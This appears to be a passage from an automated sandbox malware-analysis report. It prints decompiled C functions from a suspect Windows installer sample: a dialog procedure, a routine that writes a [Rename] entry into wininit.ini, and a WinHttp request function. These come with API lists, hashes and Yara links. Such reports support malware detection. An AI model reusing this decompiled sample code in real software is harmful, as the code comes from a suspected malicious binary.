                                                                                                                                                    0x0040582b
                                                                                                                                                    0x00405850
                                                                                                                                                    0x00405856
                                                                                                                                                    0x0040585c
                                                                                                                                                    0x0040585e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00405884
                                                                                                                                                    0x0040588a
                                                                                                                                                    0x0040588f
                                                                                                                                                    0x00405891
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00405897
                                                                                                                                                    0x0040589a
                                                                                                                                                    0x0040589d
                                                                                                                                                    0x004058b4
                                                                                                                                                    0x004058c0
                                                                                                                                                    0x004058d9
                                                                                                                                                    0x004058df
                                                                                                                                                    0x004058e3
                                                                                                                                                    0x004058e8
                                                                                                                                                    0x004058ee
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004058f8
                                                                                                                                                    0x00405903
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00405903
                                                                                                                                                    0x0040582d
                                                                                                                                                    0x00405833
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00405839
                                                                                                                                                    0x0040583f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00405845
                                                                                                                                                    0x00405819
                                                                                                                                                    0x00405910
                                                                                                                                                    0x0040591c
                                                                                                                                                    0x00405923
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040566e
                                                                                                                                                    0x0040566e
                                                                                                                                                    0x00405671
                                                                                                                                                    0x004056a4
                                                                                                                                                    0x004056a4
                                                                                                                                                    0x004056a6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004056a6
                                                                                                                                                    0x00405673
                                                                                                                                                    0x00405677
                                                                                                                                                    0x0040567c
                                                                                                                                                    0x0040567e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040568e
                                                                                                                                                    0x00405696
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040569c
                                                                                                                                                    0x004054c9
                                                                                                                                                    0x004054c9
                                                                                                                                                    0x004054cd
                                                                                                                                                    0x004054d2
                                                                                                                                                    0x004054e1
                                                                                                                                                    0x004054e1
                                                                                                                                                    0x004054ea
                                                                                                                                                    0x004054f3
                                                                                                                                                    0x004054fe
                                                                                                                                                    0x004054fe
                                                                                                                                                    0x0040550a
                                                                                                                                                    0x00405526
                                                                                                                                                    0x00405529
                                                                                                                                                    0x0040553c
                                                                                                                                                    0x00405542
                                                                                                                                                    0x004055e5
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004055ef
                                                                                                                                                    0x00405548
                                                                                                                                                    0x00405555
                                                                                                                                                    0x00405557
                                                                                                                                                    0x00405559
                                                                                                                                                    0x00405578
                                                                                                                                                    0x00405578
                                                                                                                                                    0x0040557b
                                                                                                                                                    0x00405580
                                                                                                                                                    0x00405583
                                                                                                                                                    0x00405593
                                                                                                                                                    0x00405594
                                                                                                                                                    0x00405596
                                                                                                                                                    0x004055cc
                                                                                                                                                    0x004055df
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004055df
                                                                                                                                                    0x00405598
                                                                                                                                                    0x0040559e
                                                                                                                                                    0x004055b7
                                                                                                                                                    0x004055bc
                                                                                                                                                    0x004055be
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004055c0
                                                                                                                                                    0x004055ac
                                                                                                                                                    0x004055ac
                                                                                                                                                    0x004055ae
                                                                                                                                                    0x004055ae
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004055ae
                                                                                                                                                    0x004055a1
                                                                                                                                                    0x004055a6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004055a6
                                                                                                                                                    0x00405585
                                                                                                                                                    0x0040558b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040558d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040558d
                                                                                                                                                    0x0040557d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040557d
                                                                                                                                                    0x00405563
                                                                                                                                                    0x0040556a
                                                                                                                                                    0x00405570
                                                                                                                                                    0x00405572
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00405572
                                                                                                                                                    0x0040552e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040550c
                                                                                                                                                    0x00405512
                                                                                                                                                    0x0040551c
                                                                                                                                                    0x00405929
                                                                                                                                                    0x0040592f
                                                                                                                                                    0x0040593c
                                                                                                                                                    0x00405942
                                                                                                                                                    0x00405942
                                                                                                                                                    0x0040594c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040594c
                                                                                                                                                    0x0040550a

                                                                                                                                                    APIs
                                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
                                                                                                                                                    • ShowWindow.USER32(?), ref: 004054FE
                                                                                                                                                    • DestroyWindow.USER32 ref: 00405512
                                                                                                                                                    • SetWindowLongW.USER32 ref: 0040552E
                                                                                                                                                    • GetDlgItem.USER32 ref: 0040554F
                                                                                                                                                    • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
                                                                                                                                                    • IsWindowEnabled.USER32(00000000), ref: 0040556A
                                                                                                                                                    • GetDlgItem.USER32 ref: 00405619
                                                                                                                                                    • GetDlgItem.USER32 ref: 00405623
                                                                                                                                                    • SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
                                                                                                                                                    • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                                                                                                                                    • GetDlgItem.USER32 ref: 00405734
                                                                                                                                                    • ShowWindow.USER32(00000000,?), ref: 00405756
                                                                                                                                                    • EnableWindow.USER32(?,?), ref: 00405768
                                                                                                                                                    • EnableWindow.USER32(?,?), ref: 00405783
                                                                                                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                                                                                                                                    • EnableMenuItem.USER32 ref: 004057A0
                                                                                                                                                    • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                                                                                                                                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                                                                                                                                    • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                                                                                                                                    • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                                                                                                                                    • ShowWindow.USER32(?,0000000A), ref: 0040593C
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.367328755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.367323943.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367337017.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367342716.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367363484.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367373378.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 184305955-0
                                                                                                                                                    • Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                                    • Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
                                                                                                                                                    • Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                                    • Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E622F40, Relevance: 44.0, APIs: 19, Strings: 6, Instructions: 282memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • WinHttpCrackUrl.WINHTTP(00000000,00000000,00000000,0000003C), ref: 6E62302E
                                                                                                                                                    • GetLastError.KERNEL32 ref: 6E623038
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E623070
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E6230A1
                                                                                                                                                    • WinHttpOpen.WINHTTP(Mozilla/5.0 (Windows NT 10.0),00000000,00000000,00000000,00000000,?,?,?,?,FFFFFFFF), ref: 6E6230BF
                                                                                                                                                    • GetLastError.KERNEL32 ref: 6E6230CE
                                                                                                                                                    • WinHttpCloseHandle.WINHTTP(00000000), ref: 6E6232A8
                                                                                                                                                    • WinHttpCloseHandle.WINHTTP(00000000), ref: 6E6232B8
                                                                                                                                                    • WinHttpCloseHandle.WINHTTP(00000000), ref: 6E6232C8
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Http$CloseHandle$AllocatorDebugErrorHeapLast$CrackOpen
                                                                                                                                                    • String ID: /$3(bn$<$GET$Mozilla/5.0 (Windows NT 10.0)$w+b
                                                                                                                                                    • API String ID: 291142426-4221280867
                                                                                                                                                    • Opcode ID: 07c77f04b30953b48f21c4e180ac99b910c2bbcfc26897161bd6aa663fcadc73
                                                                                                                                                    • Instruction ID: 7218c21df70c0dfcb8cdbe93a4a2c93423c94ea1d43f388468dc94b0e6b68c3a
                                                                                                                                                    • Opcode Fuzzy Hash: 07c77f04b30953b48f21c4e180ac99b910c2bbcfc26897161bd6aa663fcadc73
                                                                                                                                                    • Instruction Fuzzy Hash: E9C106B0D4021AEFDB14DFE4C958BEEBBB8BF09314F104529E515AB280DB745A44CFA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004040E4, Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                    			E004040E4(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				short* _v20;
				intOrPtr _v24;
				void* _v28;
				struct HWND__* _t61;
				signed int _t79;
				signed short* _t80;
				signed short* _t81;
				long _t94;
				intOrPtr _t105;
				signed char _t112;
				intOrPtr _t116;
				WCHAR* _t117;
				intOrPtr _t119;
				WCHAR* _t120;
				struct HWND__* _t121;

				_v12 = 0;
				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L14:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x461dc4 =  *0x461dc4 + 1;
							}
							L28:
							_t117 = _a16;
							L29:
							return E00403DF6(_a8, _a12, _t117);
						}
						_t61 = GetDlgItem(_a4, 0x3e8);
						_t117 = _a16;
						if( *((intOrPtr*)(_t117 + 8)) == 0x70b &&  *((intOrPtr*)(_t117 + 0xc)) == 0x201) {
							_t105 =  *((intOrPtr*)(_t117 + 0x1c));
							_t116 =  *((intOrPtr*)(_t117 + 0x18));
							_v24 = _t105;
							_v28 = _t116;
							_v20 = 0x46e220;
							if(_t105 - _t116 < 0x8010) {
								SendMessageW(_t61, 0x44b, 0,  &_v28);
								SetCursor(LoadCursorW(0, 0x7f02));
								ShellExecuteW(_a4, L"open", _v20, 0, 0, 1);
								SetCursor(LoadCursorW(0, 0x7f00));
								_t117 = _a16;
							}
						}
						if( *((intOrPtr*)(_t117 + 8)) != 0x700 ||  *((intOrPtr*)(_t117 + 0xc)) != 0x100) {
							goto L29;
						} else {
							if( *((intOrPtr*)(_t117 + 0x10)) == 0xd) {
								SendMessageW( *0x47eab4, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t117 + 0x10)) == 0x1b) {
								SendMessageW( *0x47eab4, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x461dc4 != 0) {
						goto L28;
					} else {
						_t119 =  *0x461db8;
						if(( *(_t119 + 0x14) & 0x00000020) == 0) {
							goto L28;
						}
						 *(_t119 + 0x14) =  *(_t119 + 0x14) & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403DB1(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00403D8D();
						goto L14;
					}
				}
				_t120 = _a16;
				_t79 =  *(_t120 + 0x30);
				if(_t79 < 0) {
					_t79 =  *( *0x476a88 - 4 + _t79 * 4);
				}
				_t80 =  *0x47ead8 + _t79 * 2;
				_t112 =  *_t80 & 0x0000ffff;
				_t81 =  &(_t80[1]);
				_a8 = _t112;
				 *0x461dbc = 0;
				_a16 = _t81;
				if((_t112 & 0x00000010) == 0) {
					_v8 = E00404039;
					_t81 = E00403FF6(_t81);
					 *0x441d60 = 1;
				} else {
					_v8 = E004040A3;
				}
				_push( *((intOrPtr*)(_t120 + 0x34)));
				_v16 = _t81;
				_push(0x22);
				E00403D6B(_a4);
				_push( *((intOrPtr*)(_t120 + 0x38)));
				_push(0x23);
				E00403D6B(_a4);
				CheckDlgButton(_a4, (0 | (( !( *(_t120 + 0x14) >> 5) |  *(_t120 + 0x14)) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403DB1(( !( *(_t120 + 0x14) >> 5) |  *(_t120 + 0x14)) & 0x00000001);
				_t121 = GetDlgItem(_a4, 0x3e8);
				E00403DC4(_t121);
				SendMessageW(_t121, 0x45b, 1, 0);
				_t94 =  *( *0x47eabc + 0x68);
				if(_t94 < 0) {
					_t94 = GetSysColor( ~_t94);
				}
				SendMessageW(_t121, 0x443, 0, _t94);
				SendMessageW(_t121, 0x445, 0, 0x4010000);
				 *0x441d50 = 0;
				SendMessageW(_t121, 0x435, 0, lstrlenW(_a16));
				SendMessageW(_t121, 0x449, _a8,  &_v16);
				 *0x461dc4 = 0;
				return 0;
			}





















                                                                                                                                                    0x004040f6
                                                                                                                                                    0x004040f9
                                                                                                                                                    0x0040423a
                                                                                                                                                    0x00404298
                                                                                                                                                    0x0040429c
                                                                                                                                                    0x00404371
                                                                                                                                                    0x00404373
                                                                                                                                                    0x00404373
                                                                                                                                                    0x00404379
                                                                                                                                                    0x00404379
                                                                                                                                                    0x0040437c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00404383
                                                                                                                                                    0x004042aa
                                                                                                                                                    0x004042b0
                                                                                                                                                    0x004042ba
                                                                                                                                                    0x004042c5
                                                                                                                                                    0x004042c8
                                                                                                                                                    0x004042cb
                                                                                                                                                    0x004042d0
                                                                                                                                                    0x004042d3
                                                                                                                                                    0x004042e0
                                                                                                                                                    0x004042ed
                                                                                                                                                    0x004042fe
                                                                                                                                                    0x00404313
                                                                                                                                                    0x00404322
                                                                                                                                                    0x00404328
                                                                                                                                                    0x00404328
                                                                                                                                                    0x004042e0
                                                                                                                                                    0x00404332
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040433d
                                                                                                                                                    0x00404341
                                                                                                                                                    0x00404351
                                                                                                                                                    0x00404351
                                                                                                                                                    0x00404357
                                                                                                                                                    0x00404363
                                                                                                                                                    0x00404363
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00404367
                                                                                                                                                    0x00404332
                                                                                                                                                    0x00404245
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00404257
                                                                                                                                                    0x00404257
                                                                                                                                                    0x00404261
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040428b
                                                                                                                                                    0x0040428e
                                                                                                                                                    0x00404293
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00404293
                                                                                                                                                    0x00404245
                                                                                                                                                    0x004040ff
                                                                                                                                                    0x00404102
                                                                                                                                                    0x00404107
                                                                                                                                                    0x00404118
                                                                                                                                                    0x00404118
                                                                                                                                                    0x00404120
                                                                                                                                                    0x00404123
                                                                                                                                                    0x00404126
                                                                                                                                                    0x00404129
                                                                                                                                                    0x0040412c
                                                                                                                                                    0x00404132
                                                                                                                                                    0x00404138
                                                                                                                                                    0x00404144
                                                                                                                                                    0x0040414b
                                                                                                                                                    0x00404151
                                                                                                                                                    0x0040413a
                                                                                                                                                    0x0040413a
                                                                                                                                                    0x0040413a
                                                                                                                                                    0x0040415b
                                                                                                                                                    0x0040415e
                                                                                                                                                    0x0040416b
                                                                                                                                                    0x00404175
                                                                                                                                                    0x0040417a
                                                                                                                                                    0x0040417d
                                                                                                                                                    0x00404182
                                                                                                                                                    0x00404199
                                                                                                                                                    0x004041a0
                                                                                                                                                    0x004041b3
                                                                                                                                                    0x004041b6
                                                                                                                                                    0x004041ca
                                                                                                                                                    0x004041d1
                                                                                                                                                    0x004041d6
                                                                                                                                                    0x004041db
                                                                                                                                                    0x004041db
                                                                                                                                                    0x004041e9
                                                                                                                                                    0x004041f7
                                                                                                                                                    0x004041fc
                                                                                                                                                    0x0040420f
                                                                                                                                                    0x0040421e
                                                                                                                                                    0x00404220
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • CheckDlgButton.USER32 ref: 00404199
                                                                                                                                                    • GetDlgItem.USER32 ref: 004041AD
                                                                                                                                                    • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
                                                                                                                                                    • GetSysColor.USER32(?), ref: 004041DB
                                                                                                                                                    • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
                                                                                                                                                    • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 00404202
                                                                                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
                                                                                                                                                    • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
                                                                                                                                                      • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
                                                                                                                                                      • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
                                                                                                                                                      • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
                                                                                                                                                    • GetDlgItem.USER32 ref: 00404276
                                                                                                                                                    • SendMessageW.USER32(00000000), ref: 0040427D
                                                                                                                                                    • GetDlgItem.USER32 ref: 004042AA
                                                                                                                                                    • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
                                                                                                                                                    • SetCursor.USER32(00000000), ref: 004042FE
                                                                                                                                                    • ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
                                                                                                                                                    • SetCursor.USER32(00000000), ref: 00404322
                                                                                                                                                    • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
                                                                                                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.367328755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.367323943.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367337017.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367342716.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367363484.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367373378.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                                                                                    • String ID: F$N$open
                                                                                                                                                    • API String ID: 3928313111-1104729357
                                                                                                                                                    • Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                    • Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
                                                                                                                                                    • Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                    • Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00406AC5, Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 163filestringmemoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00406AC5() {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* _t20;
				int _t21;
				long _t33;
				void* _t40;
				void* _t41;
				int _t48;
				void* _t49;
				intOrPtr* _t50;
				WCHAR* _t52;
				long _t54;
				void* _t58;
				struct _OVERLAPPED* _t59;
				void* _t60;
				void* _t62;
				void* _t63;

				lstrcpyW(0x465e20, L"NUL");
				_t52 =  *(_t62 + 0x1c);
				_t59 = 0;
				if(_t52 == 0) {
					L3:
					_t20 = GetShortPathNameW( *(_t62 + 0x20), 0x46b478, 0x400);
					if(_t20 != _t59 && _t20 <= 0x400) {
						_t20 = WideCharToMultiByte(_t59, _t59, 0x465e20, 0xffffffff, 0x466620, 0x400, _t59, _t59);
						if(_t20 != 0) {
							_t20 = WideCharToMultiByte(_t59, _t59, 0x46b478, 0xffffffff, 0x466c70, 0x400, _t59, _t59);
							if(_t20 != 0) {
								_t21 = wsprintfA(0x467070, "%s=%s\r\n", 0x466620, 0x466c70);
								_t63 = _t62 + 0x10;
								_t48 = _t21;
								E00406831(_t48, 0x46b478, 0x466c70, 0x46b478,  *((intOrPtr*)( *0x47eabc + 0x128)));
								_t20 = E00405E7C(0x46b478, 0xc0000000, 4);
								 *(_t63 + 0x1c) = _t20;
								if(_t20 != 0xffffffff) {
									_t54 = GetFileSize(_t20, _t59);
									_t6 = _t48 + 0xa; // 0xa
									_t58 = GlobalAlloc(0x40, _t54 + _t6);
									if(_t58 == _t59 || ReadFile( *(_t63 + 0x2c), _t58, _t54, _t63 + 0x14, _t59) == 0 || _t54 !=  *((intOrPtr*)(_t63 + 0x10))) {
										L21:
										return CloseHandle( *(_t63 + 0x1c));
									} else {
										if(E00405DE2(_t49, _t58, "[Rename]\r\n") != _t59) {
											_t60 = E00405DE2(_t49, _t30 + 0xa, "\n[");
											if(_t60 == 0) {
												_t59 = 0;
												L19:
												_t33 = _t54;
												L20:
												E00405E38(_t58 + _t33, 0x467070, _t48);
												SetFilePointer( *(_t63 + 0x28), _t59, _t59, _t59);
												WriteFile( *(_t63 + 0x2c), _t58, _t54 + _t48, _t63 + 0x14, _t59);
												GlobalFree(_t58);
												goto L21;
											}
											_t50 = _t58 + _t54;
											_t40 = _t50 + _t48;
											if(_t50 <= _t60) {
												L17:
												_t14 = _t60 - _t58 + 1; // 0x1
												_t33 = _t14;
												_t59 = 0;
												goto L20;
											}
											_t41 = _t40 - _t50;
											do {
												 *((char*)(_t41 + _t50)) =  *_t50;
												_t50 = _t50 - 1;
											} while (_t50 > _t60);
											goto L17;
										}
										lstrcpyA(_t58 + _t54, "[Rename]\r\n");
										_t54 = _t54 + 0xa;
										goto L19;
									}
								}
							}
						}
					}
				} else {
					CloseHandle(E00405E7C(_t52, 0, 1));
					_t20 = GetShortPathNameW(_t52, 0x465e20, 0x400);
					if(_t20 != 0 && _t20 <= 0x400) {
						goto L3;
					}
				}
				return _t20;
			}






















                                                                                                                                                    0x00406ad5
                                                                                                                                                    0x00406adb
                                                                                                                                                    0x00406adf
                                                                                                                                                    0x00406ae8
                                                                                                                                                    0x00406b13
                                                                                                                                                    0x00406b1e
                                                                                                                                                    0x00406b26
                                                                                                                                                    0x00406b47
                                                                                                                                                    0x00406b4b
                                                                                                                                                    0x00406b5f
                                                                                                                                                    0x00406b63
                                                                                                                                                    0x00406b79
                                                                                                                                                    0x00406b7f
                                                                                                                                                    0x00406b82
                                                                                                                                                    0x00406b90
                                                                                                                                                    0x00406b9d
                                                                                                                                                    0x00406ba2
                                                                                                                                                    0x00406ba9
                                                                                                                                                    0x00406bb7
                                                                                                                                                    0x00406bb9
                                                                                                                                                    0x00406bc6
                                                                                                                                                    0x00406bca
                                                                                                                                                    0x00406c84
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00406bf4
                                                                                                                                                    0x00406c01
                                                                                                                                                    0x00406c25
                                                                                                                                                    0x00406c29
                                                                                                                                                    0x00406c4a
                                                                                                                                                    0x00406c4c
                                                                                                                                                    0x00406c4c
                                                                                                                                                    0x00406c4e
                                                                                                                                                    0x00406c57
                                                                                                                                                    0x00406c63
                                                                                                                                                    0x00406c77
                                                                                                                                                    0x00406c7e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00406c7e
                                                                                                                                                    0x00406c2b
                                                                                                                                                    0x00406c2e
                                                                                                                                                    0x00406c33
                                                                                                                                                    0x00406c41
                                                                                                                                                    0x00406c43
                                                                                                                                                    0x00406c43
                                                                                                                                                    0x00406c46
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00406c46
                                                                                                                                                    0x00406c35
                                                                                                                                                    0x00406c37
                                                                                                                                                    0x00406c39
                                                                                                                                                    0x00406c3c
                                                                                                                                                    0x00406c3d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00406c37
                                                                                                                                                    0x00406c0c
                                                                                                                                                    0x00406c12
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00406c12
                                                                                                                                                    0x00406bca
                                                                                                                                                    0x00406ba9
                                                                                                                                                    0x00406b63
                                                                                                                                                    0x00406b4b
                                                                                                                                                    0x00406aea
                                                                                                                                                    0x00406af4
                                                                                                                                                    0x00406afd
                                                                                                                                                    0x00406b05
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00406b05
                                                                                                                                                    0x00406c93

                                                                                                                                                    APIs
                                                                                                                                                    • lstrcpyW.KERNEL32 ref: 00406AD5
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                                                                                                                                    • GetShortPathNameW.KERNEL32 ref: 00406AFD
                                                                                                                                                      • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                      • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                    • GetShortPathNameW.KERNEL32 ref: 00406B1E
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                                                                                                                                    • wsprintfA.USER32 ref: 00406B79
                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                                                                                                                                    • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                                                                                                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                                                                                                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                                                                                                                                      • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                      • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
